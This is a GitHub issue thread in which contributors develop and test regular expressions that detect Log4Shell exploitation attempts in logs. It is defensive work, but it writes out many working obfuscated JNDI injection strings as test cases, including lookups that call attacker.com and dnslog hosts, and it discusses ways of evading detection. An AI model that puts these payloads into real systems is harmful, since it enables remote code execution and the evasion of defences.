Neo23x0 / log4shell-detector

Detector for Log4Shell exploitation attempts
MIT License
729 stars 124 forks source link

Doing just the same using a RegEx #5

Open back2root opened 2 years ago

back2root commented 2 years ago

The following RegEx is just the equivalent. Don't know, if it's not a reasonable regular expression anymore, but it's doable:

(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])

It matches the following strings, even if they are (partially) URL-encoded and case-insensitive:

Example: image

Improvement Idea for the Script: To reduce false positive chance and improve performance a bit, you could maybe force, that the '$' sign in the start is immediately followed by a '{'.

Neo23x0 commented 2 years ago

That's really nice. Let me see if I can verify the regex and add it to the gist in which we use grep.

https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

Neo23x0 commented 2 years ago

I can't make it match on my log files with

sudo egrep -I -i -r '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])' /var/log

Maybe egrep is somehow limited - missing back referencing e.g.

Log line in one of the test files

2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
back2root commented 2 years ago

Not yet testen on egrep/cli in general. As it should be valid pcre, maybe a perl oneliner can bring us results. Maybe I can craft sth. later.

Neo23x0 commented 2 years ago

Sorry, I'm working on 5-7 other construction sites (YARA, Sigma, Python script, advisory for customers). Thanks for your help.

karanlyons commented 2 years ago

Agreed that this is doable with a regex, but that’s also going to miss payloads (e.g. ${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}¹, ${jnd${upper:ı}:rm${upper:ı}://addr}). You probably just want something like https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

¹ EDIT: Turns out the former won't work by default because base64 isn't actually in a release yet, just in master, but...imagine that someone added it as a custom lookup, or just consider any of the other available lookups.

back2root commented 2 years ago

Hi

I just now managed to test the regex on the CLI. The RegEx seem to work with grep -P against the test cases from this repo.

Current limitations:

➜  test-cases git:(main) ls | grep -E "log$"
test-java-exception.log
test-log-heavy-obfusc.log
test-log-log4shell-casing.log
test-log-log4shell-obf1.log
test-log-log4shell.log
test-shouldnt-match1.log
test-shouldnt-match2.log
test-url-encoded.log
test-urldecode-shouldnt-match.log

➜  test-cases git:(main) grep -V | head -n 1
grep (GNU grep) 3.4

➜  test-cases git:(main) grep -r -P '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])'
test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}

Maybe I manage to work on a version containing the missing protocols: nis|iiop|corba|nds|http If there's interest, I'm happy to share.

Neo23x0 commented 2 years ago

Yes, please. We can replace the regex in this advisory with your version if it is able to cover the old strings and their obfuscated version. https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

I wouldn't replace it as long as it can't detect the other protocols.

back2root commented 2 years ago

Since the RegEx has become a bit more complicated, I created a script that generates the RegEx and put it in its own repo log4shell-rex to make it easier to extend later.

Feel free to take it for or refference it in your gist.

➜  log4shell-rex git:(main) eval "$(./RegEx_Generator.sh)"
 _                _  _  ____  _          _ _       ____
| |    ___   __ _| || |/ ___|| |__   ___| | |     |  _ \ _____  __
| |   / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ /
| |__| (_) | (_| |__   _|__) | | | |  __/ | |_____|  _ <  __/>  <
|_____\___/ \__, |  |_||____/|_| |_|\___|_|_|     |_| \_\___/_/\_\
            |___/

➜  log4shell-rex git:(main) grep -P ${Log4ShellRex} ../log4shell-detector/tests/test-cases/*.log
../log4shell-detector/tests/test-cases/test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
../log4shell-detector/tests/test-cases/test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
../log4shell-detector/tests/test-cases/test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %24%257Bjndi%3Aldap%3A%2F%2Ftj5udg%2Ednslog%2Ecn%257D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %2524%25257Bjndi%253Aldap%253A%252F%252Ftj5udg%252Ednslog%252Ecn%25257D
karanlyons commented 2 years ago

You might want to try against this synthetic corpus, which is also trying to model what sort of attacks might be coming (or that are already being missed):

\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}
%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D
${ jndi\t: addr\n
${ jndi\t: addr\n}
${${::-j}nd${upper:ı}:rm${upper:ı}://addr}
${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}
${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}
${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}
${jndi:${lower:l}${lower:d}a${lower:p}://addr
${jndi:dns://addr}
$%7B\u006a\\156di:addr\\x7d

You can see how my detections fare, and run your own examples against the test(string) and test_thorough(string) functions.

I don’t think there’s going to be one regex to rule them all because there’s a signal to noise trade off that needs to be considered. You’d ideally match on all of them and build a confidence score naïve Bayes style. But you want to encode as few assumptions into your detections as possible, otherwise you literally won’t know what you’re missing.

back2root commented 2 years ago

@karanlyons wondering if exploit is possible without any protocol given and without forward slash: e.g. ${ jndi\t: addr\n}

image

Not yet sure about false positive rate

karanlyons commented 2 years ago

https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup:

The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a ":" no prefix will be added. By default the JDNI Lookup only supports the java, ldap, and ldaps protocols or no protocol. Additional protocols may be supported by specifying them on the log4j2.allowedJndiProtocols property.

https://docs.oracle.com/javase/jndi/tutorial/beyond/misc/policy.html:

In the comp context, there are two bindings: env and UserTransaction. The name env is bound to a subtree that is reserved for the component's environment-related bindings, as defined by its deployment descriptor. env is short for environment.

https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/5/html/administration_and_configuration_guide/naming_on_jboss-j2ee_and_jndi___the_application_component_environment#ENC_Usage_Conventions-Environment_Entries:

Environment entries are a name-to-value binding that allows a component to externalize a value and refer to the value using a name.

So a contrived example would be, e.g., that there’s comp/env/pwd = "/" and you then use ${jndi:ldap${jndi:pwd}${jndi:pwd}addr} as your vector. I do not know whether this is practical anywhere or not, so I’d much rather have my detections tell me if someone else knows it’s practical rather than assume it isn’t and get popped.

Also keep in mind that jndi is not the only lookup, and you can plausibly make use of others to construct payloads depending on what is available on the target, including any custom lookups the target may have. There’s even a base64 lookup referenced in the User’s Guide and though I’m not sure I’ve seen it working in the wild¹ it would handily break most detections I’ve seen.

Have you tried testing the detections I’ve linked above? You can get an idea of their sensitivities by throwing a corpus of known vectors and a corpus of theorized probably vectors at it. The usage.md file shows some example vectors and which detections they trigger. I’d really recommend just using them, and weighting your prioritization for any hits based on the confusion matrix you’re seeing for them with the data in your environment.

But your best plan of action is just to upgrade or mitigate (rm JndiLookup.class or log4j2.formatMsgNoLookups=true) your log4j dependencies, and practice good defense in depth (e.g., block all unknown egress—including DNS if you can handle running your own resolver safely, jail everything on your machine). No detections on remote inputs are going to be able to find every attempt, it’s a cat&mouse game stacked heavily in the attacker’s favor.

¹ EDIT: Again, because base64 isn't actually in a release yet, just in master, but—also again—imagine that someone added it as a custom lookup, or just consider any of the other available lookups.

back2root commented 2 years ago

THX @karanlyons I did some improvements on my RegEx and already get quite good coverage. Maybe still not enough to be used in IPS but good starting point for SIEM detections.

karanlyons commented 2 years ago

I’d still recommend that people use the collection of regexes I’ve put together as they’re free of assumptions. For example:

>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]

>>> BACK2ROOT_RE = re.compile(r'[elided for comment]')
>>> BACK2ROOT_RE.search('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}') or False
False

>>> t('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

If you’re having trouble just getting the regexes for use elsewhere, this is very easy to do:

>>> from log4shell_regexes import regexes
>>> for n, r in regexes.items(): print (f'{n}: {r.pattern}')
SIMPLE_RE: \$\{\s*jndi\s*:.*\}
SIMPLE_WITH_ESCAPED_CONTENT_RE: \$\{.*(?:\\|%).*\}
NESTED_RE: \$\{.*\$\{.*\}.*\}
NESTED_INCLUDING_ESCAPES_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)
ANY_RE: \$\{.*\}
ANY_INCLUDING_ESCAPES_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)
SIMPLE_OPT_RCURLY_RE: \$\{\s*jndi\s*:.*\}?
SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE: \$\{.*(?:\\|%).*\}?
NESTED_OPT_RCURLY_RE: \$\{.*\$\{.*\}.*\}?
NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
ANY_OPT_RCURLY_RE: \$\{.*\}?
ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
back2root commented 2 years ago

Updated my regex